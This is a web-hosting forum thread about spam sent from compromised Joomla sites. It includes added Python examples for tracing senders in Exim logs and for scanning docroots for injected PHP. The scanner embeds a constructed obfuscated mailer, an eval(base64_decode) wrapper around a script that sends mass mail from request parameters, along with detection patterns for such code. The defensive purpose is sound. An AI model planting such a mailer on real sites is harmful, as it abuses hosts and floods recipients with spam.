VagrantRonnie

Member
Jun 3, 2013
cPanel Access Level
Root Administrator
Hello guys
I don't know if I'm the only one facing this problem, but for a week now I've been seeing an account "team@somedomains" on several of our company's servers sending spam emails. None of the domains has any email account like "team@...", so I guess there is mailing code injected into their website content.
But I've seen this on several servers, and I'm wondering whether there is a security gap on my servers or something like that?
Can anyone help me find this guy?
 

cPanelPeter

Senior Technical Analyst
Staff member
Sep 23, 2013
cPanel Access Level
Root Administrator
Hello,

Your best bet is to review the log file (/var/log/exim_mainlog), obtain the message ID, then look for the message with that ID and find out whether the auth_id is a user on your server. If so, that account is most likely compromised and you should immediately change its password.

Feel free to open a ticket using the link in my signature and we can have one of our technical analysts review this for you, and advise accordingly.
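The procedure above (pull the message ID from exim_mainlog, then read off who submitted the message) can be automated. The following is an added example, not cPanel's code or anything posted in this thread. It parses the "<=" arrival lines that Exim writes for each accepted message, and the "cwd=" lines that cPanel's Exim logs just before a local sendmail submission, so that every message is attributed either to an SMTP AUTH identity (the A= field, the auth_id mentioned above), or to a Unix account plus the directory the sending script ran from. The log lines, message IDs, account names and paths are constructed for the example and are not real.

```python
"""Attribute outbound mail in an Exim main log to an authenticated mailbox
or to a local Unix user and the script directory that called sendmail."""
import re
from collections import Counter

# Constructed sample in the layout of cPanel's /var/log/exim_mainlog
# (IDs, hosts, addresses and paths are made up for this example).
SAMPLE_LOG = """\
2013-09-23 10:01:12 cwd=/home/acme/public_html/images/stories 3 args: /usr/sbin/sendmail -t -i
2013-09-23 10:01:12 1VNsRe-0003aB-2C <= team@acme-example.com U=acme P=local S=2310 id=9f2c@server.example.com T="You won" for victim1@example.net
2013-09-23 10:01:13 1VNsRe-0003aB-2C => victim1@example.net R=lookuphost T=remote_smtp H=mx.example.net [192.0.2.10]
2013-09-23 10:01:13 1VNsRe-0003aB-2C Completed
2013-09-23 10:01:40 cwd=/home/acme/public_html/images/stories 3 args: /usr/sbin/sendmail -t -i
2013-09-23 10:01:40 1VNsSx-0003aF-1Q <= team@acme-example.com U=acme P=local S=2310 id=a01d@server.example.com T="You won" for victim2@example.org
2013-09-23 10:02:05 1VNsTj-0003aK-0X <= bob@contoso-example.com H=(laptop) [198.51.100.7] P=esmtpa A=dovecot_login:bob@contoso-example.com S=1820 id=ccd1@laptop T="Meeting notes" for alice@example.com
2013-09-23 10:02:30 1VNsUw-0003aQ-9Z <= support@other-example.com H=(host) [203.0.113.5] P=esmtpa A=dovecot_plain:support@other-example.com S=4200 id=bb01@host T="Account notice" for victim3@example.net
2013-09-23 10:02:31 1VNsUw-0003aQ-9Z => victim3@example.net R=lookuphost T=remote_smtp H=mx.example.net [192.0.2.10]
2013-09-23 10:02:31 1VNsUw-0003aQ-9Z Completed
"""

MSG_ID = r"[0-9A-Za-z]{6}-[0-9A-Za-z]{6}-[0-9A-Za-z]{2}"
CWD_RE = re.compile(r"^(?P<ts>\S+ \S+) cwd=(?P<cwd>\S+) \d+ args: (?P<args>.*)$")
ARRIVAL_RE = re.compile(r"^(?P<ts>\S+ \S+) (?P<id>" + MSG_ID + r") <= (?P<sender>\S+) (?P<rest>.*)$")
# U= local user, P= protocol, A= authenticator:identity, S= size
FIELD_RE = re.compile(r"\b(?P<key>[UPAS])=(?P<val>\S+)")


def parse_exim_log(text):
    """Return one record per accepted message ("<=" line)."""
    records = []
    last_cwd = None  # "cwd=" line written by the sendmail call that precedes a local "<="
    for line in text.splitlines():
        m = CWD_RE.match(line)
        if m:
            last_cwd = m.group("cwd")
            continue
        m = ARRIVAL_RE.match(line)
        if not m:
            continue
        fields = dict(FIELD_RE.findall(m.group("rest")))
        records.append({
            "id": m.group("id"),
            "time": m.group("ts"),
            "sender": m.group("sender"),
            "protocol": fields.get("P"),
            "user": fields.get("U"),     # Unix account for local (script) submissions
            "auth_id": fields.get("A"),  # SMTP AUTH identity for esmtpa submissions
            "cwd": last_cwd if fields.get("P") == "local" else None,
        })
        last_cwd = None
    return records


def origin(rec):
    """Describe where a message really came from, regardless of its From address."""
    if rec["auth_id"]:
        return "auth_id=" + rec["auth_id"]
    if rec["protocol"] == "local":
        return "user=%s cwd=%s" % (rec["user"], rec["cwd"])
    return "unauthenticated protocol=%s" % rec["protocol"]


def sender_origins(records, sender=None):
    """Count messages per origin, optionally restricted to one envelope sender."""
    return Counter(origin(r) for r in records if sender is None or r["sender"] == sender)


def find_message(records, msg_id):
    """Look up a single message by its Exim message ID."""
    for r in records:
        if r["id"] == msg_id:
            return r
    return None


if __name__ == "__main__":
    recs = parse_exim_log(SAMPLE_LOG)
    for o, n in sender_origins(recs, "team@acme-example.com").most_common():
        print(n, o)
```

On a real server, feed it the contents of /var/log/exim_mainlog and filter on the spamming From address: an A= origin means a mailbox password to reset, while a user=... cwd=... origin points at the account and the directory where the injected script lives.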
 

VagrantRonnie

Member
Jun 3, 2013
cPanel Access Level
Root Administrator
Thank you for answer.
I've figured out that in most of my clients' hosting space that was running an outdated Joomla version, there was an injected file named "web-info.php", which was encrypted with base64, and this file was running the required script to send spam emails.
ClamAV is able to detect and remove these kinds of files, but they come back again.
Is there any way to prevent these kinds of files from being executed?
I cannot force all of my customers to update their Joomla, and I cannot disable the base64 decoder.
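A base64 blob on its own is harmless, so rather than disabling the decoder a scanner can look for the combination that an injected mailer like the one described above needs: an opaque base64 string handed to a decoder and then to eval() or similar, with a mail or socket call inside the decoded payload. This is an added example, not ClamAV's logic or a file from the poster's servers. The "clean" contact form and the "injected" web-info.php it writes into a temporary docroot are constructed for the example, as are the paths and addresses in them.

```python
"""Flag PHP files that combine a large base64 blob with a decoder and an
execution primitive, the shape of a typical injected spam mailer."""
import base64
import os
import re
import tempfile
import time

# Individually common in legitimate PHP; suspicious when found together with an opaque blob.
EXEC_RE = re.compile(r"\b(eval|assert|create_function|preg_replace)\s*\(", re.I)
DECODE_RE = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)
MAIL_RE = re.compile(r"\b(mail|popen|proc_open|fsockopen)\s*\(", re.I)
BLOB_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{200,})['\"]")

# Constructed samples: a plain contact form and an obfuscated mailer.
CLEAN = "<?php if ($_POST) { mail('owner@acme-example.com', 'Contact form', $_POST['msg']); } ?>"
PAYLOAD = (
    "<?php error_reporting(0); $to=$_POST['t']; $s=$_POST['s']; $b=$_POST['b']; "
    "$h='From: team@'.$_SERVER['HTTP_HOST']; foreach(explode(',',$to) as $r){ mail($r,$s,$b,$h); } "
    "echo 'ok'; ?>"
)
INJECTED = "<?php eval(base64_decode('" + base64.b64encode(PAYLOAD.encode()).decode() + "')); ?>"


def scan_source(src):
    """Return the indicator names present in one PHP source string."""
    found = []
    if EXEC_RE.search(src):
        found.append("exec-function")
    if DECODE_RE.search(src):
        found.append("decoder")
    if MAIL_RE.search(src):
        found.append("mailer")
    for blob in BLOB_RE.findall(src):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("latin-1")
        except Exception:
            continue  # not valid base64 (e.g. a long hex or token string)
        found.append("base64-blob")
        # One decoding layer is enough to expose a single-layer mailer payload.
        if DECODE_RE.search(decoded) or MAIL_RE.search(decoded):
            found.append("decoded-payload")
        break
    return found


def is_suspicious(found):
    """A blob plus either an execution primitive or a mail call inside the blob."""
    return "base64-blob" in found and ("exec-function" in found or "decoded-payload" in found)


def scan_tree(root, max_age_days=None):
    """Walk a docroot and return [(path, indicators)] for suspicious PHP files."""
    hits = []
    cutoff = time.time() - max_age_days * 86400 if max_age_days else None
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, name)
            if cutoff and os.path.getmtime(path) < cutoff:
                continue  # only recently changed files, useful on a large shared host
            with open(path, "r", encoding="latin-1") as fh:
                found = scan_source(fh.read())
            if is_suspicious(found):
                hits.append((path, found))
    return hits


def demo():
    """Write the two constructed files into a temporary docroot and scan it."""
    root = tempfile.mkdtemp(prefix="docroot-")
    os.makedirs(os.path.join(root, "images", "stories"))
    with open(os.path.join(root, "contact.php"), "w") as fh:
        fh.write(CLEAN)
    with open(os.path.join(root, "images", "stories", "web-info.php"), "w") as fh:
        fh.write(INJECTED)
    return scan_tree(root, max_age_days=7)


if __name__ == "__main__":
    for path, found in demo():
        print(path, found)
```

Run it against /home/*/public_html with a short max_age_days after a cleanup to catch reinfections early; it only peels one layer of encoding, so multi-layer or gzipped payloads show up as "base64-blob" plus "exec-function" without "decoded-payload", which is still enough to flag them.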
 

quizknows

Well-Known Member
Oct 20, 2009
cPanel Access Level
DataCenter Provider
You need to get them to update Joomla and change their administrator passwords, or they WILL be hacked again.

Your only option to even try to prevent that is a good paid modsec rule set like Trustwave's or Atomicorp's. Still, modsec rules can be evaded by skilled hackers.

Do not let your customers run outdated and vulnerable software. I know a lot of people don't want to update, but you should have a ToS that prohibits abuse, and that abuse is their fault if they're running known-hackable versions of Joomla or other CMS software.